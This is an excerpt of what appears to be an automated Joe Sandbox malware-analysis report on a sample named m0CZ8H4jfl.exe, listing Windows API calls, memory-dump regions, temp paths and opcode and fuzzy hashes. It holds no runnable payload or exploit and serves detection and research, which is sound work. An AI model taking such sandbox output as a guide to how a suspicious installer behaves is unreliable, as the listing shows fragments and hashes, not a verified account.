                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1912718029-0
                                                                                                          • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                          • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                          • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                          • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                          APIs
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                          • GlobalAlloc.KERNEL32(?,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1797544878.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1797527224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797584618.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797605819.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1148316912-0
                                                                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 1849352358-0
                                                                                                          • Opcode ID: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                          • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                          • Opcode Fuzzy Hash: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                          • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                          • wsprintfW.USER32 ref: 00404A1A
                                                                                                          • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                          • String ID: %u.%u%s%s
                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                          • Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                          • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                          • Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                          • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                          APIs
                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Timeout
                                                                                                          • String ID: !
                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                          • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                          • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                          • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                          • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4C
                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
                                                                                                          • RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F90
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                          • String ID: Call
                                                                                                          • API String ID: 3677997916-1824292864
                                                                                                          • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                          • Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
                                                                                                          • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                          • Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B
                                                                                                          Strings
                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                          • API String ID: 2659869361-297319885
                                                                                                          • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                          • Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
                                                                                                          • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                          • Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE
                                                                                                          APIs
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                            • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,76F923A0), ref: 0040520F
                                                                                                            • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                            • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                            • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                          • WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E95
                                                                                                          • WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401EAA
                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                          • String ID:
                                                                                                          • API String ID: 3585118688-0
                                                                                                          • Opcode ID: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                          • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                          • Opcode Fuzzy Hash: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                          • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                          • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                          • String ID:
                                                                                                          • API String ID: 2102729457-0
                                                                                                          • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                          • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                          • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                          • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,?,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                            • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\m0CZ8H4jfl.exe"), ref: 00405AC2
                                                                                                            • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                            • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                          • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\m0CZ8H4jfl.exe"), ref: 00405B6A
                                                                                                          • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,76F93420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A
                                                                                                          Strings
                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                          • API String ID: 3248276644-297319885
                                                                                                          • Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                          • Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
                                                                                                          • Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                          • Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD
                                                                                                          APIs
                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                          • lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                          • wsprintfW.USER32 ref: 100015F2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1797544878.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1797527224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797584618.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797605819.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocGloballstrcpywsprintf
                                                                                                          • String ID: s<u
                                                                                                          • API String ID: 2689062267-779365171
                                                                                                          • Opcode ID: b666731ea850b0db34310f966fc1483e79c072b1553816228d181fcf3b6ead58
                                                                                                          • Instruction ID: d9a8518b4a308c4ae7950fd45204b89885c5383cf9e926244676a8cd36a9aa9c
                                                                                                          • Opcode Fuzzy Hash: b666731ea850b0db34310f966fc1483e79c072b1553816228d181fcf3b6ead58
                                                                                                          • Instruction Fuzzy Hash: 68E02070205C21E7F121D7249C88ACD37F4EF812E77124124F706EA18CDB31CA434785
                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                          • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                          Strings
                                                                                                          • Error launching installer, xrefs: 00405748
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                          • String ID: Error launching installer
                                                                                                          • API String ID: 3712363035-66219284
                                                                                                          • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                          • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                          • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                          • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNEL32(?,76F93420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
                                                                                                          • GlobalFree.KERNEL32(?), ref: 0040382A
                                                                                                          Strings
                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403809
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
